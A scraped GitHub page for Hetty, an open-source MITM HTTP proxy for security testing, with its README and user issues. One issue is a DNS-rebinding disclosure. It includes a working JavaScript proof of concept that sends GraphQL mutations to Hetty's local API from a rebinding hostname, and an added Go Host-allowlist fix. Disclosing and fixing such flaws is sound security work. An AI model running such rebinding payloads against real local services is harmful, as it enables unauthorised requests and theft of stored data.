
hetty's Introduction


Hetty is an HTTP toolkit for security research. It aims to become an open source alternative to commercial software like Burp Suite Pro, with powerful features tailored to the needs of the infosec and bug bounty community.

Hetty proxy logs (screenshot)

Features

  • Machine-in-the-middle (MITM) HTTP proxy, with logs and advanced search
  • HTTP client for manually creating/editing requests, and replay proxied requests
  • Intercept requests and responses for manual review (edit, send/receive, cancel)
  • Scope support, to help keep work organized
  • Easy-to-use web based admin interface
  • Project based database storage, to help keep work organized

👷‍♂️ Hetty is under active development. Check the backlog for the current status.

📣 Are you pen testing professionally in a team? I would love to hear your thoughts on tooling via this 5 minute survey. Thank you!

Getting started

💡 The Getting started doc has more detailed install and usage instructions.

Installation

The quickest way to install and update Hetty is via a package manager:

macOS

brew install hettysoft/tap/hetty

Linux

sudo snap install hetty

Windows

scoop bucket add hettysoft https://github.com/hettysoft/scoop-bucket.git
scoop install hettysoft/hetty

Other

Alternatively, you can download the latest release from GitHub for your OS and architecture, and move the binary to a directory in your $PATH. If your OS is not available for one of the package managers or not listed in the GitHub releases, you can compile from source (link coming soon).

Docker

Docker images are distributed via GitHub's Container registry and Docker Hub. To run Hetty via Docker with a volume for database and certificate storage, and port 8080 forwarded:

docker run -v $HOME/.hetty:/root/.hetty -p 8080:8080 \
  ghcr.io/dstotijn/hetty:latest

Usage

Once installed, start Hetty via:

hetty

💡 Read the Getting started doc for more details.

To list all available options, run hetty --help:

$ hetty --help

Usage:
    hetty [flags] [subcommand] [flags]

Runs an HTTP server with (MITM) proxy, GraphQL service, and a web based admin interface.

Options:
    --cert         Path to root CA certificate. Creates file if it doesn't exist. (Default: "~/.hetty/hetty_cert.pem")
    --key          Path to root CA private key. Creates file if it doesn't exist. (Default: "~/.hetty/hetty_key.pem")
    --db           Database directory path. (Default: "~/.hetty/db")
    --addr         TCP address for HTTP server to listen on, in the form \"host:port\". (Default: ":8080")
    --chrome       Launch Chrome with proxy settings applied and certificate errors ignored. (Default: false)
    --verbose      Enable verbose logging.
    --json         Encode logs as JSON, instead of pretty/human readable output.
    --version, -v  Output version.
    --help, -h     Output this usage text.

Subcommands:
    - cert  Certificate management

Run `hetty <subcommand> --help` for subcommand specific usage instructions.

Visit https://hetty.xyz to learn more about Hetty.

Documentation

📖 Read the docs

Support

Use issues for bug reports and feature requests, and discussions for questions and troubleshooting.

Community

💬 Join the Hetty Discord server

Contributing

Want to contribute? Great! Please check the Contribution Guidelines for details.

Acknowledgements

Sponsors

Sponsored by Tines

💖 Are you enjoying Hetty? You can sponsor me!

License

MIT

© 2022 Hetty Software

hetty's People

Contributors

dependabot[bot], dstotijn, dwisiswant0, hahwul, holiman, michalzalecki, stevenmaude, tcarrio


hetty's Issues

Display parsed request query params

Is your feature request related to a problem? Please describe.
It would be nice to have all the query parameters/URLEncodedForm listed in a separate box. In this way you can see immediately what you are sending.

Describe the solution you'd like
A box under the current request one would be fine.

Describe alternatives you've considered
Another option could be to make a sort of drop-down-like behaviour that displays all the parameters sent in a concise way.

Additional context
image

After this box make something like mitmproxy
image
image

Anyway nice project

Hetty

Is your feature request related to a problem? Please describe.
A clear and concise description of what the problem is. Ex. I'm always frustrated when [...]

Describe the solution you'd like
A clear and concise description of what you want to happen.

Describe alternatives you've considered
A clear and concise description of any alternative solutions or features you've considered.

Additional context
Add any other context or screenshots about the feature request here.

DNS rebinding attacks on Hetty's API

Describe the bug

Hetty is vulnerable to DNS rebinding attacks because it does not validate the Host header.

A malicious remote server could exploit this to:

  • trigger arbitrary HTTP requests to other hosts from the Hetty server (this could be used to attack services on the local network, localhost or internet);
  • exfiltrate confidential data stored in Hetty.

Tested on 100.0a1 (2022-03-23).

I believe recent versions of Chrome are somehow protected against this type of attack.

See as well https://www.gabriel.urdhr.fr/tags/dns-rebinding/ for more details in the context of other applications.

To Reproduce

function sleep(delay)
{
  return new Promise((resolve, reject) => {
    setTimeout(resolve, delay);
  });
}
async function main()
{
  while(true) {
    try {
      const response = await fetch("/api/graphql/", {
        method: "POST",
        headers: {
          "Content-Type": "application/json",
        },
        body: `{"operationName":"CreateProject","variables":{"name":"ddd"},"query":"mutation CreateProject($name: String!) {\\n  createProject(name: $name) {\\n id\\n    name\\n    __typename\\n  }\\n}"}`
      });
      if (response.status == 200) {
        alert("DONE!?")
        return;
      }
    }
    catch(e) {
    }
    await sleep(1000);
  }
}
main();

Served from a remote webserver such as:

http://a.192.0.2.1.1time.127.0.0.1.forever.9b173d68-dac5-4377-ba53-7a6473d130fe.rebind.network:8080/

Expected behavior

Requests coming from another origin should be rejected.

Screenshots

Desktop (please complete the following information):

Smartphone (please complete the following information):

Additional context
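
As an added example (not part of the issue report and not Hetty's own code), one way to get the expected behaviour is a Host/Origin allowlist in front of the API handler. The allowlist contents and the names hostAllowed, rebindGuard and statusFor are assumptions; the rejected host in main is the rebinding hostname quoted in the report.

```go
package main

import (
	"fmt"
	"net"
	"net/http"
	"net/http/httptest"
	"net/url"
	"strings"
)

// Assumption: the admin UI/API is only meant to be reached under these names.
var allowedHosts = map[string]bool{"localhost": true, "127.0.0.1": true, "::1": true}

// hostAllowed strips an optional port, IPv6 brackets and a trailing dot,
// then checks the lower-cased hostname against the allowlist.
func hostAllowed(hostport string) bool {
	host := hostport
	if h, _, err := net.SplitHostPort(hostport); err == nil {
		host = h
	}
	host = strings.Trim(host, "[]")
	host = strings.TrimSuffix(strings.ToLower(host), ".")
	return allowedHosts[host]
}

// rebindGuard rejects requests whose Host (or Origin, when sent) is not allowlisted.
func rebindGuard(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if !hostAllowed(r.Host) {
			http.Error(w, "host not allowed", http.StatusForbidden)
			return
		}
		if origin := r.Header.Get("Origin"); origin != "" {
			u, err := url.Parse(origin)
			if err != nil || !hostAllowed(u.Host) {
				http.Error(w, "origin not allowed", http.StatusForbidden)
				return
			}
		}
		next.ServeHTTP(w, r)
	})
}

// statusFor sends a constructed POST to /api/graphql/ through the guard
// and returns the status code the client would see.
func statusFor(host, origin string) int {
	api := http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		w.WriteHeader(http.StatusOK) // stand-in for the real GraphQL handler
	})
	req := httptest.NewRequest(http.MethodPost, "/api/graphql/", strings.NewReader("{}"))
	req.Host = host
	if origin != "" {
		req.Header.Set("Origin", origin)
	}
	rec := httptest.NewRecorder()
	rebindGuard(api).ServeHTTP(rec, req)
	return rec.Code
}

func main() {
	rebind := "a.192.0.2.1.1time.127.0.0.1.forever.9b173d68-dac5-4377-ba53-7a6473d130fe.rebind.network:8080"
	fmt.Println(statusFor("localhost:8080", ""), statusFor(rebind, "http://"+rebind))
}
```

Such a guard belongs only on the admin/API routes, since requests passing through the proxy legitimately carry arbitrary Host values.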

Hetty urldecodes request before displaying.

To Reproduce
Steps to reproduce the behavior:

  1. curl "https://httpbin.org/get?something=somet%22ing" -x localhost:8080 -k
  2. See GET /get?something=somet"ing HTTP/1.1 in logs.

Expected behavior
Do not do such transformations before displaying.

Desktop (please complete the following information):

  • OS: Linux arch 5.9.9-arch1-1 #1 SMP PREEMPT Wed, 18 Nov 2020 19:52:04 +0000 x86_64 GNU/Linux

Additional context
As a developer, I want to see the raw request because sometimes it matters whether the payload was urlencoded or not. If it is not a bug but an intentional transformation - add a setting that can disable this behavior.

Build from source error (no go file)

Hi, @dstotijn
I encountered a minor problem while following the README, because there's no Go file on the root (/) path.

go get github.com/dstotijn/hetty
package github.com/dstotijn/hetty: no Go files in /Users/hahwul/go/src/github.com/dstotijn/hetty

[Enhancement] Add PR checks

Until #14 is in place, there should at least be some simple tests on PRs that ensure

  • package can be built
  • make command can be executed
  • docker image can be built
  • package can be run

This is making it easier for maintainers and contributors to see if any proposed changes break basic functionality.
An easy option for this could be github actions.

Add unit tests

Add tests to make sure everything is working as expected.
Additionally, it's best practice for larger projects.

Chrome executable not found even when $CHROME_EXECUTABLE defined and google-chrome is in path

Describe the bug

2023/01/18 13:45:07 INFO [main] Hetty (v0.7.0) is running on :8080 ...
2023/01/18 13:45:07 INFO [main] Get started at http://localhost:8080
2023/01/18 13:45:07 INFO [main] Chrome executable not found.

To Reproduce

Steps to reproduce the behavior:

  1. Using WSL Ubuntu 22
  2. Installed hetty with snap
  3. Installed chrome by downloading official .deb package from google, then
  4. sudo apt install ./google-chrome-stable_current_amd64.deb
  5. CHROME_EXECUTABLE=/usr/bin/google-chrome was defined after installing
  6. /usr/bin/google-chrome was added to path after installing

Error:
INFO [main] Chrome executable not found

Expected behavior
Chrome executable should be launched with hetty

Screenshots
WindowsTerminal_ondR2YY2d1

Desktop (please complete the following information):

  • OS: WSL 22 LTS on Windows 11
  • Kernel: 5.15.79.1-microsoft-standard-WSL2 (amd64)
  • Browser: Google Chrome Version 109.0.5414.74
  • Snap Version 2.57.5+22.04ubuntu0.1
  • Hetty Version 0.7.0

Additional context
Even before I tried adding CHROME_EXECUTABLE and adding /usr/bin/google-chrome to path manually, no success

Enlarge proxy request list

Is your feature request related to a problem? Please describe.
When I'm looking at the proxy request list, I can't enlarge the list and see more requests.

Describe the solution you'd like
I would like that in the request list there is a slider or something to be able to enlarge the window.

Suggestions

Can we use other Burp Suite plugins here, like external installation?

Optimize queries for fetching requests

Description

Currently, when querying requests from the database to be displayed on the "Proxy log", we're loading everything related to a request. This significantly increases page load time.

Proposed solution

Instead, when resolving queries, we should only traverse the tree for requested fields in the GraphQL query, e.g. use Field Collection and build queries based off that.

[Suggestion] Traffic Capture

Is your feature request related to a problem? Please describe.
To speed up development and spend more time on other areas of the project.

Describe the solution you'd like
Why not leave the traffic capture functionality to an already established and dedicated program like bettercap or ettercap?
Instead just forward traffic from bettercap or ettercap to hetty where it can then be analysed.
https://github.com/Ettercap/ettercap
https://github.com/bettercap/bettercap

Describe alternatives you've considered
Develop this functionality within the project but, this will take more time and work.

Additional context

Remember the last open project

Is your feature request related to a problem? Please describe.

Each time I restart Hetty I have to activate the project.

Describe the solution you'd like

I would like my last project to be selected without any additional action. I think this is safe enough to make this a new default behavior. The question is, where to store this information?

My initial idea is to save it in a simple text file in the projPath e.g. ~/.hetty/projects/last_open or something like that.

The other idea that might be worth considering is to have a project-agnostic database file e.g. ~/.hetty/Config.db where all settings that aren't related to any particular project can be stored.

Let me know what you think, I'm happy to work on it.

Exclude assets from database.

Is your feature request related to a problem? Please describe.
Running the proxy for 30 minutes I got a 25MB database and the API started to be visibly slower (3-5 seconds reported by Chrome Developer tool) ...

-rw-r--r--  1 bogdan bogdan  25M Sep 28 21:48 hetty.db

Describe the solution you'd like
The proxy should have a list of predefined content-types or file extensions that it should avoid storing in the history log (at least the response body).
example : js | css | png | jpg | gif | ico | ttf | woff | woff2

Add debug flag

Is your feature request related to a problem? Please describe.
Since the tool itself is still pretty young, chances are there are issues.
A debug flag will help maintainers and users to better understand problems

Describe the solution you'd like
add --debug as an option

Fix WebSockets in `proxy` package

Proxying WebSockets (e.g. the upgrade process and handling frames) is not working at all. Should check if it's feasible with httputil.ReverseProxy and what the solution can be.

Suggestion: URL endpoint for easy certificate sharing

First of all, thank you for starting this project. I admittedly haven't had much time yet to really look around and play with it, but looks like a very handy tool to have!

One quick suggestion that I'd already like to make is one for convenience and with some luck one that is relatively easy to implement:

When one wants to play around with mobile devices, you need to somehow get the certificate to them.
It would be convenient if Hetty had a special URL endpoint like "/ssl" or "/getssl" like Charles Proxy to download the generated/configured certificate. You'd be able to grab your phone/tablet, browse to that built-in link, install the certificate and be on your traffic-inspecting way!

Cert install fails due to fork process

Describe the bug
using hetty cert install fails

To Reproduce
Steps to reproduce the behavior:

  1. install hetty using snap on kali
  2. add bin to env file
  3. type hetty cert install

hetty cert install
2023/11/06 11:56:53 INFO To install the certificate in the system trust store, you might be prompted for your password.
2023/11/06 11:56:53 FATAL Command failed. {"error": "failed to install certificate: failed to execute sudo: fork/exec /usr/bin/sudo: permission denied"}

Expected behavior
cert installs

Screenshots
If applicable, add screenshots to help explain your problem.

Desktop (please complete the following information):

  • OS: kali vm latest

Remove all project logs

Is your feature request related to a problem? Please describe.
Each time I run hetty the log records are persisted and over time it slows down the UI significantly.

Describe the solution you'd like
I want to have a button, next to the search field, that allows me to clear all logs that are currently in the active project.

Additional context
I'm happy to work on it but before I start I would like to hear your thoughts @dstotijn to not waste time on a closed PR.

PS. Contribution Guidelines mention using labels but editing labels is disabled.

Suggestion - add more customization for web interface

It's a bit hard to use this tool after the burpsuite as the proxy tabs look uncomfortable to me. It would be cool to have a possibility to resize these "windows" like proxy logs, request, and response tabs. The proxy log table also lacks customization as we can't change the columns' order or add new ones (for example, 'id').

Add docker support for additional architectures

Is your feature request related to a problem? Please describe.
The docker image made available on docker hub is only compatible with the "linux/arm64/v8" architecture.

Describe the solution you'd like
It would be useful to support other popular architectures such as "linux/amd64" as well.

Describe alternatives you've considered
I've tried to run it with "docker run --platform=linux/amd64", but this was unsuccessful.

use genji instead of SQLite

I saw your message on the genji Slack.

I use genji and love it, and it would make it easier to work on your project too. I like the concept of an infosec tool like this, and for setting bug bounties on GitHub projects with it.

automated installing of a root CA to your local OS or browser trust store

Is your feature request related to a problem? Please describe.

An easy way to automate the creation and installation of local ztLS so that https works for all OS and browsers you have installed.

Describe the solution you'd like

Golang based and reproducibility using the Golang tool called mkcert from the security researcher that works at Google.

https://github.com/FiloSottile/mkcert

Describe alternatives you've considered

None. I find mkcert to work very well.

Additional context

Proxy error: tls

I just downloaded the latest release file and ran it directly. I got the following error when I go to http://127.0.0.1:8080 (HTTP ERROR 502). It happened on both Mac and Linux (Kali).
Is this a bug or just something wrong with my operation?

Add projects

Problem

Typically, HTTP security research work is done in the context of a project, e.g. a specific bug bounty program, website/web service. To make it easier to consolidate all settings and accumulated work (scope, logs, results, notes, module settings, etc.), there is a need to store all of this, preferably in a portable format that can be copied, imported, stored in backups, etcetera.

Proposed solution

Add support for project files; e.g. CRUD ops to manage per-project databases, similar to Burp Suite Pro and others.

[ERROR] Securing client connection failed: handshake error: EOF

Describe the bug
The CA was set up as in the doc, but I still get the error
[ERROR] Securing client connection failed: handshake error: EOF

Expected behavior
https support

Screenshots
image
Desktop (please complete the following information):

Smartphone (please complete the following information):

  • Device: [e.g. iPad 7]
  • OS: [e.g. iOS13.5.1]
  • Browser [e.g. stock browser, safari]
  • Version [e.g. 22]

Additional context
Add any other context about the problem here.
